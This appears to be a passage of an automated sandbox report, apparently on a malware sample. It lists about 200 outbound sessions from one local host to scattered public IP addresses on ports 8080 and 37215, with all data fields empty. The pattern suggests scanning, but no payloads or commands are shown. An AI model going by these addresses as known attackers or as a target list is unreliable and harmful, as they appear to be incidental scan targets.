                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7116192.168.2.2356046166.22.239.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7117192.168.2.2357074110.183.141.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7118192.168.2.2349620168.176.220.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7119192.168.2.235474686.24.31.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7120192.168.2.2355262112.181.217.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7121192.168.2.2357646202.91.0.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7122192.168.2.234936665.72.15.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7123192.168.2.2345670148.237.16.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7124192.168.2.233806236.100.205.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7125192.168.2.233754281.170.124.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7126192.168.2.2344946167.90.5.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7127192.168.2.2358156137.147.228.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7128192.168.2.235224445.220.159.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7129192.168.2.2335478116.5.16.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7130192.168.2.23502065.42.131.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7131192.168.2.2335006151.154.207.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7132192.168.2.2340152100.192.176.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7133192.168.2.2355036191.221.17.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7134192.168.2.233320698.217.211.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7135192.168.2.2349632187.115.219.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7136192.168.2.2348038175.128.104.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7137192.168.2.2352456209.107.110.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7138192.168.2.2351232134.109.114.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7139192.168.2.2339612106.250.156.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7140192.168.2.2341070108.64.43.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7141192.168.2.2335124145.7.3.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7142192.168.2.2360356198.238.240.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7143192.168.2.2353786172.5.185.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7144192.168.2.235948866.91.185.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7145192.168.2.235829259.224.6.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7146192.168.2.2336490209.192.42.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7147192.168.2.235058081.125.34.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7148192.168.2.2359492173.23.34.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7149192.168.2.2355398141.252.78.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7150192.168.2.23428941.122.73.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7151192.168.2.2360918155.183.227.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7152192.168.2.2342454186.140.127.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7153192.168.2.2357454126.193.47.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7154192.168.2.2356286153.2.100.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7155192.168.2.2352960123.143.48.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7156192.168.2.233715695.17.236.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7157192.168.2.235937471.75.87.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7158192.168.2.2340470187.222.212.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7159192.168.2.234312442.23.89.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7160192.168.2.2350932155.95.170.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7161192.168.2.235517285.67.155.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7162192.168.2.234235245.151.19.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7163192.168.2.235594020.231.1.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7164192.168.2.2336956209.225.197.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7165192.168.2.235557894.189.169.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7166192.168.2.23345549.165.133.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7167192.168.2.2354350134.110.253.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7168192.168.2.2336190124.34.182.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7169192.168.2.2333530204.220.5.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7170192.168.2.234030662.73.204.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7171192.168.2.23428242.82.16.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7172192.168.2.2343576217.42.148.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7173192.168.2.23573209.77.74.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7174192.168.2.235364890.47.116.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7175192.168.2.2336952220.131.235.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7176192.168.2.233776834.98.123.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7177192.168.2.234517031.39.239.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7178192.168.2.2334402177.215.195.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7179192.168.2.233345418.176.133.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7180192.168.2.2347566169.150.57.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7181192.168.2.2339084217.110.67.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7182192.168.2.234461446.127.23.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7183192.168.2.2333356221.213.113.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7184192.168.2.233938857.241.79.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7185192.168.2.235384665.105.142.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7186192.168.2.2338932200.33.7.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7187192.168.2.2347474223.37.163.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7188192.168.2.2353176137.21.89.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7189192.168.2.23418948.216.19.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7190192.168.2.235280267.15.89.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7191192.168.2.23553149.191.181.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7192192.168.2.2356762146.161.148.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7193192.168.2.233454876.206.44.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7194192.168.2.2352502135.37.173.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7195192.168.2.2344730123.56.249.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7196192.168.2.2360736110.179.77.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7197192.168.2.2340072175.162.187.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7198192.168.2.2357310118.95.10.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7199192.168.2.2351552184.223.59.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7200192.168.2.234093436.64.185.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7201192.168.2.2347888123.206.236.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7202192.168.2.2346086125.12.110.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7203192.168.2.235584691.8.237.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7204192.168.2.2336246107.186.116.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7205192.168.2.236030840.200.31.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7206192.168.2.2349836158.54.164.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7207192.168.2.233413444.161.27.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7208192.168.2.2346226140.152.84.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7209192.168.2.234254274.156.120.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7210192.168.2.233551279.117.217.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7211192.168.2.2342638197.36.76.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7212192.168.2.235233241.73.56.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7213192.168.2.235518441.180.162.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7214192.168.2.2347050157.203.248.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7215192.168.2.235864041.165.141.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7216192.168.2.233896841.176.121.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7217192.168.2.235199241.226.6.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7218192.168.2.2339208197.63.2.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7219192.168.2.234859641.75.163.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7220192.168.2.235339462.202.194.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7221192.168.2.2335444197.234.21.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7222192.168.2.234142041.99.224.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7223192.168.2.2358452157.152.101.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7224192.168.2.2337380168.148.73.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7225192.168.2.235757241.168.213.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7226192.168.2.2351512157.125.98.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7227192.168.2.234466098.140.60.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7228192.168.2.2341934197.75.15.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7229192.168.2.2348672197.18.169.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7230192.168.2.233489868.72.139.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7231192.168.2.2343216157.121.165.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7232192.168.2.2353942157.164.35.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7233192.168.2.2352178157.29.239.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7234192.168.2.235623641.103.101.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7235192.168.2.2334604157.104.125.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7236192.168.2.2346128157.228.181.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7237192.168.2.233671841.1.208.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7238192.168.2.233498641.248.25.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7239192.168.2.2346286114.75.154.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7240192.168.2.2354546157.145.82.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7241192.168.2.2339582157.155.12.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7242192.168.2.2357758197.34.108.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7243192.168.2.236011041.156.9.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7244192.168.2.234909041.11.123.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7245192.168.2.233703841.221.168.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7246192.168.2.233478441.208.36.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7247192.168.2.234508435.136.103.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7248192.168.2.2352188112.177.108.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7249192.168.2.2339046197.48.120.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7250192.168.2.2360936197.236.137.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7251192.168.2.2344898212.143.56.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7252192.168.2.2345594128.241.196.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7253192.168.2.2347752157.146.240.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7254192.168.2.2332784157.195.50.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7255192.168.2.2340750157.73.251.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7256192.168.2.2334764210.140.8.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7257192.168.2.2353806168.24.203.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7258192.168.2.2353812157.61.242.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7259192.168.2.2357420209.54.106.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7260192.168.2.234241641.14.181.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7261192.168.2.233529841.186.44.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7262192.168.2.2352694197.59.89.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7263192.168.2.235608880.70.161.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7264192.168.2.2344228130.112.218.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7265192.168.2.234760024.51.229.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7266192.168.2.234240441.57.201.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7267192.168.2.2337164157.195.106.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7268192.168.2.236084684.239.217.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7269192.168.2.2349228185.116.37.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7270192.168.2.2352426197.219.95.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7271192.168.2.235753641.154.100.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7272192.168.2.2360704157.122.254.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7273192.168.2.2345766157.185.175.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7274192.168.2.2346490167.82.47.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7275192.168.2.2338872157.41.168.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7276192.168.2.2351238197.10.50.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7277192.168.2.2345130157.129.73.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7278192.168.2.233330041.121.165.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7279192.168.2.2359464157.25.93.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7280192.168.2.2335536197.122.69.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7281192.168.2.2345354157.199.142.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7282192.168.2.2333728208.37.243.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7283192.168.2.2357980197.164.239.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7284192.168.2.235970646.119.234.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7285192.168.2.2353076157.231.244.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7286192.168.2.2336746197.199.187.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7287192.168.2.2339186157.96.10.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7288192.168.2.236090241.111.163.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7289192.168.2.2355140197.128.19.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7290192.168.2.2336016197.25.125.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7291192.168.2.233984841.214.248.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7292192.168.2.235059041.150.43.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7293192.168.2.236021241.52.89.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7294192.168.2.2340528197.13.237.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7295192.168.2.2338654157.42.116.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7296192.168.2.235050031.112.166.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7297192.168.2.236086241.143.200.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7298192.168.2.233641241.209.232.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7299192.168.2.2348646157.37.142.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7300192.168.2.2339160197.113.206.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7301192.168.2.2347388197.203.197.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7302192.168.2.2338636131.31.60.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7303192.168.2.2335468119.195.248.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7304192.168.2.2350070197.104.33.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7305192.168.2.235285641.197.172.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7306192.168.2.2347290157.121.231.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7307192.168.2.2336312157.38.40.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7308192.168.2.2355558186.233.248.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7309192.168.2.2332768157.133.16.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7310192.168.2.2338242149.187.123.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7311192.168.2.2359372197.211.103.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7312192.168.2.233804041.205.79.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7313192.168.2.235622059.123.3.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7314192.168.2.2348038197.127.179.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7315192.168.2.2333952157.113.0.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7316192.168.2.233377641.243.241.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7317192.168.2.235975441.22.231.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7318192.168.2.234500841.46.125.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7319192.168.2.2355234197.125.43.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7320192.168.2.2340224223.14.182.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7321192.168.2.2338852157.48.85.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7322192.168.2.2358858209.228.75.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7323192.168.2.2338160175.187.176.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7324192.168.2.235770241.144.64.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7325192.168.2.234049841.184.86.21837215
                                                        TimestampBytes transferredDirectionData


